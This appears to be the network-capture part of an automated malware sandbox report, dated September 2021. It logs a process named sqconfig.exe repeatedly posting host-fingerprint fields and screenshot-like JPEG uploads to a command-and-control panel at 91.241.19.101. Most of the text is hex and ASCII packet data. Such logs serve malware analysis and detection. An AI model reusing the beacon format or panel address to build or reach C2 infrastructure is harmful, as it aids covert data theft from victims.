                                                                  Sep 30, 2021 23:53:59.201749086 CEST19656OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:59.317177057 CEST19669OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:59.317229986 CEST19681OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:53:59.317270994 CEST19682OUTData Raw: e9 ec cc bf b4 78 6f c0 da 7c 91 da 14 69 e4 39 10 a3 ef 96 66 ec 3d 87 e9 51 69 5a 5d dd 9f 86 35 ab fd 44 6d bf d4 63 96 79 53 fb 83 61 da bf 86 4f e7 8a d8 d3 7c 2d a2 69 13 79 d6 5a 74 51 ca 3a 3b 12 ec 3e 85 89 23 f0 ab 5a d7 fc 80 75 1f fa
                                                                  Data Ascii: xo|i9f=QiZ]5DmcySaO|-iyZtQ:;>#Zu@4UvaJemR]61Z)E2B){LE.E4b0Ryt;2`Sq74&1J8L)>@KGzE\wGEE|jC15(2&i]FsIEiE6)
                                                                  Sep 30, 2021 23:53:59.317554951 CEST19696OUTData Raw: 58 da 39 35 fb c7 47 05 59 59 81 04 1e a0 8c 55 3d 22 c3 45 d5 75 99 a4 91 af 6c b4 5b 78 3c eb 82 f2 24 92 c7 c8 50 03 05 01 b2 ec bf c2 38 27 8e 33 57 21 f0 9c 0b 7b 65 05 dc d2 a2 47 7f 73 6b a9 3a 95 f9 12 15 12 16 4c 8e 33 1e e2 33 9e 47 e1
                                                                  Data Ascii: X95GYYU="Eul[x<$P8'3W!{eGsk:L33GG54(ns1[:g;I$p59!mxs]0AZ#QI](r?&WMLQE0KEHL;QEZ(S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJ
                                                                  Sep 30, 2021 23:53:59.662870884 CEST19705INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  202192.168.2.35003891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:59.603861094 CEST19705OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:59.790633917 CEST19705INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  203192.168.2.35003991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:59.994807959 CEST19706OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:59.994905949 CEST19706OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:59.995088100 CEST19716OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:59.995213985 CEST19719OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:00.128741980 CEST19722OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:00.129307032 CEST19733OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:00.129350901 CEST19736OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:54:00.129565954 CEST19745OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:54:00.264846087 CEST19759OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:00.265144110 CEST19767OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:54:00.265166044 CEST19769OUTData Raw: a6 05 37 42 27 95 99 42 4f 13 26 8b 38 a4 35 45 af f1 d0 54 2d 7e e7 a5 76 f2 33 91 50 93 35 3e 5f 5a 43 24 63 a9 ac 66 ba 90 f7 a8 cc ae 7b d3 e4 34 58 77 d4 db 37 51 2f 61 51 b6 a2 ab d3 15 8d 92 7b d1 c9 a3 91 1a 2a 09 1a 6d aa 31 e9 50 3e a1
                                                                  Data Ascii: 7B'BO&85ET-~v3P5>_ZC$cf{4Xw7Q/aQ{*m1P>!TdTCURiUYZ(P0JQ@RR$Z1J\N@4v(-1Q@\j~f_j[pZh_U_KefqO;pkvxgQLAKIKLi(Ei;L.P)h!(
                                                                  Sep 30, 2021 23:54:00.726363897 CEST19794INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  204192.168.2.35004091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:00.031878948 CEST19719OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:00.242331982 CEST19745INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  205192.168.2.35004191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:00.782311916 CEST19794OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:00.987839937 CEST19795INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:54:01.008084059 CEST19795OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:01.008172989 CEST19795OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:01.008394003 CEST19805OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:01.008616924 CEST19808OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:01.128324032 CEST19816OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:01.128478050 CEST19829OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:01.129842043 CEST19835OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:54:01.245352983 CEST19838OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:54:01.245446920 CEST19848OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:54:01.245502949 CEST19867OUTData Raw: c4 5a 41 45 2d 6e 72 85 2d 02 8a 04 2d 2d 25 2d 4b 13 16 96 92 8a 04 2d 14 94 b4 80 5a 75 32 9d de 82 47 50 28 a2 90 85 a7 53 45 2d 21 16 20 93 07 15 d1 e8 72 6d ba 8f fd ea e5 94 e1 b3 5b 7a 34 df e9 29 fe f0 ae 3c 54 2f 06 7a 79 75 5b 55 48 d8
                                                                  Data Ascii: ZAE-nr---%-K-Zu2GP(SE-! rm[z4)<T/zyu[UH&,^eeu6~kYeu[3\cu$pV/'bN7P)iq]'%mF)@j <@)TZC18p\/=*[4Q)i*4Q/=)B6h4)Bf
                                                                  Sep 30, 2021 23:54:01.245755911 CEST19877OUTData Raw: af b9 4a a3 5f d7 95 bf 23 b7 b9 d7 74 6b 89 3f b3 ae af a3 6f b5 e9 9f 62 bb d4 6c ad 9a 3b 78 dc 4c 24 8c a4 3b 57 08 36 80 c1 51 79 2c 40 27 93 95 a4 1d 27 46 d7 23 b7 b8 d6 61 b9 d3 af 6d e4 b5 bd b8 b4 86 5d b1 23 8c 02 03 aa b3 15 21 5b 01
                                                                  Data Ascii: J_#tk?obl;xL$;W6Qy,@''F#am]#![{g;F_7zxVu&Ve}fu_D&#d{t-2Kl5X_O%Acw"3OGh'?iw{wu}2ko;Yqr)$ip\pxHMA
                                                                  Sep 30, 2021 23:54:02.127872944 CEST19882INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  206192.168.2.35004291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:01.902354002 CEST19882OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:02.138567924 CEST19883INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  207192.168.2.35004391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:02.382463932 CEST19883OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:02.581368923 CEST19923INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  208192.168.2.35004491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:02.455111980 CEST19884OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:02.455219984 CEST19884OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:02.455449104 CEST19894OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:02.455575943 CEST19897OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:02.572801113 CEST19900OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
